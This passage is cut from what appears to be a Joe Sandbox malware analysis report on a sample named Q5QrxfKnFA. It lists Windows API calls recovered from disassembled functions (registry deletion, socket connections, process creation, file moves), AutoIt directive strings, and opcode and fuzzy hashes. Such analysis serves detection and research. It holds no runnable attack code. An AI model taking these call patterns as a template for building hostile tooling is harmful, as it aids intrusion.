                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: ,,=$DllGetClassObject
                                                        • API String ID: 753597075-4126740902
                                                        • Opcode ID: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                                        • Instruction ID: 9a6761c2772a3f77d1fa871767dc8a4d407a988db77effac4057804441390d0a
                                                        • Opcode Fuzzy Hash: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                                        • Instruction Fuzzy Hash: 394160B2600204EFDF16DF64C885A9ABBB9EF54310F5681A9ED09DF205D7B1DD44CBA0
                                                        APIs
                                                          • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A3697,?), ref: 003A468B
                                                          • Part of subcall function 003A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A3697,?), ref: 003A46A4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 003A36B7
                                                        • _wcscmp.LIBCMT ref: 003A36D3
                                                        • MoveFileW.KERNEL32(?,?), ref: 003A36EB
                                                        • _wcscat.LIBCMT ref: 003A3733
                                                        • SHFileOperationW.SHELL32(?), ref: 003A379F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: 5035849113202a4da89976479bb34354592ea9c287a744217ebedb040c333631
                                                        • Instruction ID: b8797dd1c8585e70bd020582186319eeca5304427de2fcf101f0769369441f87
                                                        • Opcode Fuzzy Hash: 5035849113202a4da89976479bb34354592ea9c287a744217ebedb040c333631
                                                        • Instruction Fuzzy Hash: A4415D71508344AEC757EF64C4819DFB7ECEF8A380F44092EB49AC7261EA35D689C752
                                                        APIs
                                                        • _memset.LIBCMT ref: 003C72AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7351
                                                        • IsMenu.USER32(?), ref: 003C7369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C73B1
                                                        • DrawMenuBar.USER32 ref: 003C73C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: c724f626829a3f4cad20ad4132c9fb20299250292259e07e24bc0595a65c03f3
                                                        • Instruction ID: f02686e6f52cddc0714018bf2c67bc20c09d5d97696330e9ade4d216e1c3161b
                                                        • Opcode Fuzzy Hash: c724f626829a3f4cad20ad4132c9fb20299250292259e07e24bc0595a65c03f3
                                                        • Instruction Fuzzy Hash: E0412579A04248AFDB21DF50D884E9ABBF9FB09350F258529FD15EB290D730AD50DF90
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003C0FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C0FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 003C10B5
                                                          • Part of subcall function 003C0FA5: RegCloseKey.ADVAPI32(?), ref: 003C101B
                                                          • Part of subcall function 003C0FA5: FreeLibrary.KERNEL32(?), ref: 003C106D
                                                          • Part of subcall function 003C0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003C1090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003C1058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: f346392252f6f8a3a3a769714a6a962040bdadc3a3cfbb0fa7947aa8613539f8
                                                        • Instruction ID: b57682f76aab3b2169a8ce314267065265ca9a75342ad71a851385976df7f538
                                                        • Opcode Fuzzy Hash: f346392252f6f8a3a3a769714a6a962040bdadc3a3cfbb0fa7947aa8613539f8
                                                        • Instruction Fuzzy Hash: 62310C71901119BFDB16DB90DC89EFFB7BCEF09300F004169E512E2151EA75AE89ABA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C62EC
                                                        • GetWindowLongW.USER32(00C4D508,000000F0), ref: 003C631F
                                                        • GetWindowLongW.USER32(00C4D508,000000F0), ref: 003C6354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C6386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C63B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C63C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C63DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                                        • Instruction ID: 834a83bcbd4e6c28b0b769ca64b92cfec298d61bfe5730a54cd21a681af6ac6b
                                                        • Opcode Fuzzy Hash: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                                        • Instruction Fuzzy Hash: E6311139644290AFDB22DF18EC86F5937E5FB4A714F1A41A8F900DF2B2CB71AC509B50
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DB2E
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DB54
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0039DB57
                                                        • SysAllocString.OLEAUT32(?), ref: 0039DB75
                                                        • SysFreeString.OLEAUT32(?), ref: 0039DB7E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0039DBA3
                                                        • SysAllocString.OLEAUT32(?), ref: 0039DBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 8f95f6eb559ced9ac0f74d7ad33701ed8422d166823ece412979e7cab3e02276
                                                        • Instruction ID: de2cc6aebe650d9f1841b7d8cb1d1079a99d73e678d015a4a8add84fc02b9800
                                                        • Opcode Fuzzy Hash: 8f95f6eb559ced9ac0f74d7ad33701ed8422d166823ece412979e7cab3e02276
                                                        • Instruction Fuzzy Hash: 7E21D332600219AFDF11EFB9DC89CBB73ADEB08360B028526F918DB260D674EC418760
                                                        APIs
                                                          • Part of subcall function 003B7D8B: inet_addr.WSOCK32(00000000), ref: 003B7DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 003B61C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003B61D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 003B6217
                                                        • WSAGetLastError.WSOCK32 ref: 003B6221
                                                        • closesocket.WSOCK32(00000000), ref: 003B624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B6263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: 0f63d15b122b2d7050993ac5ad595f68fb8c09077c5e37b64a4cd5c251e648e4
                                                        • Instruction ID: 9f00c9eac411e8bde8e6e907046b8e49f33744f897be218b2c04860e6dca2801
                                                        • Opcode Fuzzy Hash: 0f63d15b122b2d7050993ac5ad595f68fb8c09077c5e37b64a4cd5c251e648e4
                                                        • Instruction Fuzzy Hash: 1E31A431600208AFEF12AF24CC86FBE77ADEF45754F054429FA05DB692CB74AC048B61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 608c99f49de9510a74e715c9e96923447bf4fa57075705e528adb98a23f222a9
                                                        • Instruction ID: 68450bdf58f6b946a74bd6241e21dd4626de650702a56184147160c3e3eff4d0
                                                        • Opcode Fuzzy Hash: 608c99f49de9510a74e715c9e96923447bf4fa57075705e528adb98a23f222a9
                                                        • Instruction Fuzzy Hash: 4F2149722046116EDB23AA34AC03EB773DCDF56390F15843AF845CB191EB61ED41C295
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DC09
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039DC2F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0039DC32
                                                        • SysAllocString.OLEAUT32 ref: 0039DC53
                                                        • SysFreeString.OLEAUT32 ref: 0039DC5C
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0039DC76
                                                        • SysAllocString.OLEAUT32(?), ref: 0039DC84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 3f43f9a7d209ed0bfdfa458c0af071689998869627f9ae9a8e2024b2b891850c
                                                        • Instruction ID: d7dd417132eb4917b569416991c0f78fcbe29850b3526511e6362fc5c52d2c59
                                                        • Opcode Fuzzy Hash: 3f43f9a7d209ed0bfdfa458c0af071689998869627f9ae9a8e2024b2b891850c
                                                        • Instruction Fuzzy Hash: 12218335604204BF9F15EFA9DC89DAB77EDEB08360B118125F915CB260DAB0EC41CB64
                                                        APIs
                                                          • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                          • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                          • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C7632
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C763F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C764A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C7659
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C7665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 3ee37def9a711f11e0dca229b8fb449013bf33dcae3ebea90ffeecd716896092
                                                        • Instruction ID: 194aca5528048c633491e0b1bd696eebc99a0efcf942370ddd1123b70135d53b
                                                        • Opcode Fuzzy Hash: 3ee37def9a711f11e0dca229b8fb449013bf33dcae3ebea90ffeecd716896092
                                                        • Instruction Fuzzy Hash: 0C1186B215011DBFEF159F64CC85EE77F5DEF08798F114115BA44A6050C672AC21DBA4
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 00369AE6
                                                          • Part of subcall function 00363187: EncodePointer.KERNEL32(00000000), ref: 0036318A
                                                          • Part of subcall function 00363187: __initp_misc_winsig.LIBCMT ref: 003631A5
                                                          • Part of subcall function 00363187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00369EA0
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00369EB4
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00369EC7
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00369EDA
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00369EED
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00369F00
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00369F13
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00369F26
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00369F39
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00369F4C
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00369F5F
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00369F72
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00369F85
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00369F98
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00369FAB
                                                          • Part of subcall function 00363187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00369FBE
                                                        • __mtinitlocks.LIBCMT ref: 00369AEB
                                                        • __mtterm.LIBCMT ref: 00369AF4
                                                          • Part of subcall function 00369B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00369AF9,00367CD0,003FA0B8,00000014), ref: 00369C56
                                                          • Part of subcall function 00369B5C: _free.LIBCMT ref: 00369C5D
                                                          • Part of subcall function 00369B5C: DeleteCriticalSection.KERNEL32(02@,?,?,00369AF9,00367CD0,003FA0B8,00000014), ref: 00369C7F
                                                        • __calloc_crt.LIBCMT ref: 00369B19
                                                        • __initptd.LIBCMT ref: 00369B3B
                                                        • GetCurrentThreadId.KERNEL32 ref: 00369B42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: 85bb979361e4f24f3da067e654af05343063b2746ae50322846eed425cbc1403
                                                        • Instruction ID: 151dd6f3b79746348cfb8b0a1e52b23807c6815a05d321c9b3726d15bdc18197
                                                        • Opcode Fuzzy Hash: 85bb979361e4f24f3da067e654af05343063b2746ae50322846eed425cbc1403
                                                        • Instruction Fuzzy Hash: F0F0623250971159EA277B74BC0375A269DDF02734F21C62BF450CA0DAEF7094414160
                                                        APIs
                                                        • _memset.LIBCMT ref: 003CB644
                                                        • _memset.LIBCMT ref: 003CB653
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00406F20,00406F64), ref: 003CB682
                                                        • CloseHandle.KERNEL32 ref: 003CB694
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateHandleProcess
                                                        • String ID: o@$do@
                                                        • API String ID: 3277943733-129461833
                                                        • Opcode ID: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                                        • Instruction ID: 58a3d92cd6c2a13b1f5d2fc31f7b4d4533f24bee871a2eb62a7280cd69608c1f
                                                        • Opcode Fuzzy Hash: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                                        • Instruction Fuzzy Hash: C7F0FEB25403067EE2117765BC06FBB7A9DEB09795F028031BA0AF9196DB765C2087AC
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00363F85), ref: 00364085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0036408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 00364097
                                                        • DecodePointer.KERNEL32(00363F85), ref: 003640B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                                        • Instruction ID: 24402bb8bfb72211142273a4164d60ed17a2848369e37926acaebacdcafcc74e
                                                        • Opcode Fuzzy Hash: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                                        • Instruction Fuzzy Hash: A0E09274981200AFEB12AF61EE09B467AAEB718743F154435F111E91A0CFB656048B18
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                        • Instruction ID: 8ff70186d5936da298381f278c7f5b673d80cd7ead626fe7162adae50148c43e
                                                        • Opcode Fuzzy Hash: c501d2cfef9f23abf16beb4b3eec8b141f75e8ad3671055b0f970422b07e1cb8
                                                        • Instruction Fuzzy Hash: F061793090065A9BCF17EF64CC82ABF37A9EF4A308F094919F8595F1A2DB35E915CB50
                                                        APIs
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                          • Part of subcall function 003C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C02BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C02FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003C0320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003C0349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003C038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003C0399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
